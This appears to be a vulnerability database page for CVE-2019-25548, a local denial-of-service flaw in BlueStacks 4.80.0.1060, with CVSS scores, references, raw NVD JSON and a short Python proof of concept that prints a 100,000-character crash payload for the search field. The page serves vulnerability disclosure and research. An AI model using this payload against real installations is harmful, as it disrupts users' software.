CVE-2019-25548

Description

BlueStacks 4.80.0.1060 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input to the search field. Attackers can paste a buffer of 100,000 'A' characters into the search field and trigger a search operation to cause the application to crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:bluestacks:bluestacks:4.80.0.1060:*:*:*:*:*:*:* - VULNERABLE

BlueStacks 4.80.0.1060

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept (PoC) for CVE-2019-25548
# This script generates a payload to crash BlueStacks 4.80.0.1060
# Usage: Copy the generated string and paste it into the BlueStacks search field, then press Enter.

def generate_bluestacks_dos_payload():
    # The vulnerability is triggered by a buffer of approximately 100,000 characters
    payload = "A" * 100000
    return payload

if __name__ == "__main__":
    exploit_data = generate_bluestacks_dos_payload()
    print(f"Generated Payload Length: {len(exploit_data)}")
    print("Payload:")
    print(exploit_data)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25548
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25548
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25548/
[4] VulDB https://vuldb.com/cve/CVE-2019-25548
[5] https://www.bluestacks.com
[6] https://www.exploit-db.com/exploits/46893
[7] https://www.vulncheck.com/advisories/bluestacks-denial-of-service-via-search-field

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25548", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:16.753", "lastModified": "2026-04-16T17:52:18.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BlueStacks 4.80.0.1060 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input to the search field. Attackers can paste a buffer of 100,000 'A' characters into the search field and trigger a search operation to cause the application to crash."}, {"lang": "es", "value": "BlueStacks 4.80.0.1060 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al enviar una entrada de tamaño excesivo al campo de búsqueda. Los atacantes pueden pegar un búfer de 100.000 caracteres 'A' en el campo de búsqueda y activar una operación de búsqueda para hacer que la aplicación se bloquee."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-466"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bluestacks:bluestacks:4.80.0.1060:*:*:*:*:*:*:*", "matchCriteriaId": "E8663920-DF15-4168-88E5-040BC758921F"}]}]}], "references": [{"url": "https://www.bluestacks.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46893", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/bluestacks-denial-of-service-via-search-field", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}